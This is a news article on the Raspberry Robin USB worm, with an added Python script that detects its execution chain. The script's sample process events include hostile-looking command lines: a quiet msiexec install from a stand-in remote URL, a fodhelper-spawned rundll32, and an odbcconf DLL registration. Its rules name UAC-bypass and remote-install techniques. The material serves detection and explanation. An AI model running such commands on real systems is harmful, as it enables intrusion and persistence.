Analysts from Red Canary have discovered new malware for Windows called Raspberry Robin, which behaves like a worm and spreads via USB drives.
The researchers write that they found the malware in the networks of several of their clients, including unnamed companies from the technology and manufacturing sectors.
Let me remind you that we also wrote about the new Bumblebee malware downloader, which became a replacement for BazarLoader for hackers.
It soon became clear that Raspberry Robin spreads when an infected USB drive containing a malicious .LNK file is connected to a machine. The worm then starts a new process on the system, using cmd.exe to launch a malicious file stored on the infected drive.
The malware uses the Microsoft Standard Installer (msiexec.exe) to reach its command-and-control servers; the researchers believe that these C&C servers are hosted on compromised QNAP devices and that Tor exit nodes are used as additional infrastructure.
While the experts are not yet sure exactly how the malware gains a foothold on infected systems, they suspect that it installs malicious DLL files on compromised machines in order to persist across reboots.
Raspberry Robin runs the DLL using two other legitimate Windows utilities: fodhelper and odbcconf. The first allows it to bypass User Account Control (UAC), while the second is used to execute and configure the DLL.
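The execution chain described in the paragraphs above (a .LNK on a USB drive, cmd.exe launching a file from the drive, msiexec.exe reaching out to a C&C server, then fodhelper and odbcconf loading a DLL) can be turned into a simple detection pass over process-creation telemetry. The script below is an added example for that purpose; it is not code from Red Canary or from this article. The sample events, file paths, the E: drive letter, the child-process list and the rule logic are all constructed assumptions meant to illustrate the stages, not real Raspberry Robin artefacts.

```python
"""Toy detection pass over constructed process-creation events for the
execution chain described above (USB .LNK -> cmd.exe -> msiexec.exe ->
fodhelper/odbcconf). Illustrative only: events, paths and thresholds are
made up, and the rules are deliberately simple."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (fields modelled on Sysmon Event ID 1)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str   # command line of the new process


def _exe(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# Rule 1: cmd.exe launched from Explorer with a command line that references a
# file on a drive other than the system drive. Assumption: the removable drive
# was mounted as a non-C: letter; real telemetry would be joined with
# device-arrival events to confirm it is actually a USB drive.
_NON_SYSTEM_DRIVE = re.compile(r"\b[D-Zd-z]:\\")


def rule_cmd_from_removable(ev: ProcEvent) -> bool:
    return (_exe(ev.image) == "cmd.exe"
            and _exe(ev.parent_image) == "explorer.exe"
            and _NON_SYSTEM_DRIVE.search(ev.command_line) is not None)


# Rule 2: msiexec.exe asked to install a package from a URL rather than a local file.
_URL = re.compile(r"https?://", re.IGNORECASE)


def rule_msiexec_url(ev: ProcEvent) -> bool:
    return _exe(ev.image) == "msiexec.exe" and _URL.search(ev.command_line) is not None


# Rule 3: fodhelper.exe (an auto-elevating Windows binary) spawning a shell or
# loader. The child list is an assumption chosen for this example.
_SUSPICIOUS_CHILDREN = {"cmd.exe", "rundll32.exe", "odbcconf.exe", "powershell.exe"}


def rule_fodhelper_child(ev: ProcEvent) -> bool:
    return (_exe(ev.parent_image) == "fodhelper.exe"
            and _exe(ev.image) in _SUSPICIOUS_CHILDREN)


# Rule 4: odbcconf.exe given a DLL on its command line (its REGSVR action loads DLLs).
def rule_odbcconf_dll(ev: ProcEvent) -> bool:
    return _exe(ev.image) == "odbcconf.exe" and ".dll" in ev.command_line.lower()


RULES = {
    "cmd_from_removable_drive": rule_cmd_from_removable,
    "msiexec_remote_url": rule_msiexec_url,
    "fodhelper_spawns_child": rule_fodhelper_child,
    "odbcconf_loads_dll": rule_odbcconf_dll,
}


def detect(events):
    """Return (rule name, event) pairs for every rule that fires, in event order."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev))
    return hits


def chain_score(events) -> int:
    """Number of distinct chain stages observed; several stages together on one
    host is a far stronger signal than any single rule firing on its own."""
    return len({name for name, _ in detect(events)})


# Constructed sample telemetry (not real Raspberry Robin artefacts).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              r'cmd.exe /c "E:\readme.dat"'),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\cmd.exe",
              r"msiexec.exe /q /i http://example.invalid/pkg.msi"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\fodhelper.exe",
              r"rundll32.exe C:\Users\Public\sample.dll,Start"),
    ProcEvent(r"C:\Windows\System32\odbcconf.exe", r"C:\Windows\System32\rundll32.exe",
              r'odbcconf.exe /a {regsvr "C:\Users\Public\sample.dll"}'),
    # Benign noise: a normal local MSI install and Explorer opening Notepad.
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
              r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi"'),
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
              r"notepad.exe C:\Users\alice\notes.txt"),
]

if __name__ == "__main__":
    for name, ev in detect(SAMPLE_EVENTS):
        print(f"[{name}] {ev.command_line}")
    print("chain stages observed:", chain_score(SAMPLE_EVENTS))
```

Each rule on its own will produce false positives (local MSI installs, legitimate drive letters), which is why the example also counts how many distinct stages appear together; in practice these rules would be scoped to a single host and a short time window, and the removable-drive rule would be correlated with device-insertion events rather than inferred from a drive letter.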
At the same time, the researchers admit that they have not yet been able to figure out how and where Raspberry Robin infects external drives; it is assumed that this generally happens offline. Another important question also remains unanswered: what is the ultimate goal of the Raspberry Robin operators?